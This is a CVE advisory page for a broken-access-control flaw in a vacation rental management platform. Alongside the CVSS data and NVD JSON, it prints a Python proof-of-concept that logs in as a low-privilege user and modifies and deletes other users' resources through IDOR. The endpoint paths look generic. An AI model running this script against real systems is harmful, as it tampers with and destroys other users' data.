Security Vulnerability Report
中文
CVE-2025-63562 CVSS 6.3 MEDIUM

CVE-2025-63562

Published: 2025-10-31 20:15:53
Last Modified: 2025-11-05 19:24:13

Description

Summer Pearl Group Vacation Rental Management Platform prior to v1.0.2 suffers from insufficient server-side authorization. Authenticated attackers can call several endpoints and perform create/update/delete actions on resources owned by arbitrary users by manipulating request parameters (e.g., owner or resource id).

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:summerpearlgroup:vacation_rental_management_platform:*:*:*:*:*:*:*:* - VULNERABLE
Summer Pearl Group Vacation Rental Management Platform < v1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-63562 PoC - Summer Pearl Group Vacation Rental Management Platform Broken Access Control # Target: Summer Pearl Group Vacation Rental Management Platform < v1.0.2 TARGET_URL = "http://target-server.com" LOGIN_URL = f"{TARGET_URL}/api/auth/login" ATTACK_ENDPOINT = f"{TARGET_URL}/api/resources" # Step 1: Authenticate with low-privilege account login_data = { "username": "[email protected]", "password": "attacker_password" } session = requests.Session() login_response = session.post(LOGIN_URL, json=login_data) if login_response.status_code != 200: print("[-] Authentication failed") exit(1) print("[+] Successfully authenticated with low-privilege account") # Step 2: Exploit Insecure Direct Object Reference (IDOR) to access/modify other users' resources # Modify the 'owner' or 'resource_id' parameter to target arbitrary users # Example: Update resource owned by another user (victim_user_id) victim_user_id = "victim_12345" malicious_payload = { "owner": victim_user_id, "resource_id": "1001", "action": "update", "data": { "name": "Modified by Attacker", "description": "Malicious modification via IDOR" } } attack_response = session.post(ATTACK_ENDPOINT, json=malicious_payload) if attack_response.status_code == 200: print("[+] IDOR exploit successful - accessed/modified victim's resource") print(f"[+] Response: {attack_response.json()}") else: print(f"[-] Exploit failed with status code: {attack_response.status_code}") # Example: Delete resource owned by another user delete_payload = { "owner": victim_user_id, "resource_id": "1001", "action": "delete" } delete_response = session.post(f"{ATTACK_ENDPOINT}/delete", json=delete_payload) if delete_response.status_code == 200: print("[+] Resource deletion successful - IDOR confirmed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63562", "sourceIdentifier": "[email protected]", "published": "2025-10-31T20:15:53.450", "lastModified": "2025-11-05T19:24:12.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Summer Pearl Group Vacation Rental Management Platform prior to v1.0.2 suffers from insufficient server-side authorization. Authenticated attackers can call several endpoints and perform create/update/delete actions on resources owned by arbitrary users by manipulating request parameters (e.g., owner or resource id)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:summerpearlgroup:vacation_rental_management_platform:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.2", "matchCriteriaId": "E70289E7-BECA-463B-ABB1-0C46DBDF2057"}]}]}], "references": [{"url": "https://github.com/Stolichnayer/Summer-Pearl-Group-Broken-Access-Control", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}